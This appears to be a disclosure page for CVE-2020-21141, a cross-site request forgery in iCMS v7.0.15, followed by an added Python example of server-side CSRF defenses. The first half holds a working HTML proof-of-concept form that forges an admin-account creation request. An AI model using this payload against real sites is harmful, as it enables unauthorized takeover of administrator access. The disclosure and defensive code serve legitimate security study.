CVE-2020-21141: just_for_fun/ICMS CSRF at master · hxcc/just_for_fun
iCMS v7.0.15 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admincp.php?app=members&do=add.
URL: http://example.com/admincp.php?app=members&do=add
Effect: the forged request adds an admin account with the username `test`.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://icms7.idreamsoft.com/admincp.php?app=members&do=save&frame=iPHP&CSRF_TOKEN=4c28f0f8QKQNRAGZMLvRszVV4M4YP-Z9LcQw5n4jlHvq8TB75xVPVxXEAm-CemjoSPieJrYFxlq0J5VblFF1FY5qJah0_jlDDAKiTXs" method="POST">
<input type="hidden" name="uid" value="0" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="gid" value="1" />
<input type="hidden" name="uname" value="test" />
<input type="hidden" name="pwd" value="test123" />
<input type="hidden" name="nickname" value="test" />
<input type="hidden" name="realname" value="" />
<input type="hidden" name="info[QQ]" value="" />
<input type="hidden" name="info[blog]" value="" />
<input type="hidden" name="info[year]" value="" />
<input type="hidden" name="info[month]" value="" />
<input type="hidden" name="info[day]" value="" />
<input type="hidden" name="info[from]" value="" />
<input type="hidden" name="info[sign]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
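For the defender's side of the issue above, here is an added example (not part of this repository and not iCMS code) showing the two server-side checks that stop a cross-site form post from reaching a state-changing admin action such as `members&do=save`: a CSRF token that is bound to the session and compared in constant time, and an Origin/Referer check against the site's own origin. The PoC above reaches the save action with a `CSRF_TOKEN` placed in the query string, so the example deliberately reads the token from the POST body only. `SITE_ORIGIN`, `SERVER_SECRET`, the session id and the request dictionaries are constructed values for the example.

```python
import hashlib
import hmac
from typing import Mapping, Optional, Tuple

# Constructed example values; a real deployment keeps the secret out of source.
SITE_ORIGIN = "https://icms.example"
SERVER_SECRET = b"replace-with-a-random-server-secret"


def issue_csrf_token(session_id: str) -> str:
    """Derive the CSRF token from the session id with an HMAC, so a token
    taken from another session (or a fixed one) is useless for a forged post."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id: str, presented: Optional[str]) -> bool:
    """Constant-time comparison against the token this session should hold."""
    if not presented:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), presented)


def origin_is_allowed(headers: Mapping[str, str]) -> bool:
    """Second line of defence: a form submitted from another site carries that
    site's Origin (or, on older browsers, a Referer), which will not match."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == SITE_ORIGIN
    referer = headers.get("Referer", "")
    return referer.startswith(SITE_ORIGIN + "/")


def admin_save_allowed(session_id: str, headers: Mapping[str, str],
                       form: Mapping[str, str]) -> Tuple[bool, str]:
    """Gate for a state-changing admin action. The token is read from the POST
    body only; anything in the query string is ignored. Returns (allowed, reason)."""
    if not origin_is_allowed(headers):
        return False, "cross-site origin"
    if not token_is_valid(session_id, form.get("CSRF_TOKEN")):
        return False, "bad or missing CSRF token"
    return True, "ok"


if __name__ == "__main__":
    sid = "sess-123"
    tok = issue_csrf_token(sid)
    # Legitimate same-site post with the session's own token.
    print(admin_save_allowed(sid, {"Origin": SITE_ORIGIN}, {"CSRF_TOKEN": tok}))
    # Cross-site post shaped like the PoC form: rejected on Origin alone.
    print(admin_save_allowed(sid, {"Origin": "https://attacker.example"},
                             {"uname": "test", "gid": "1"}))
```

The order of the checks matters only for the reason string; both must pass. The Origin check catches the forged post even when a valid token has leaked, and the session-bound token catches a request whose headers are missing or have been stripped by a proxy.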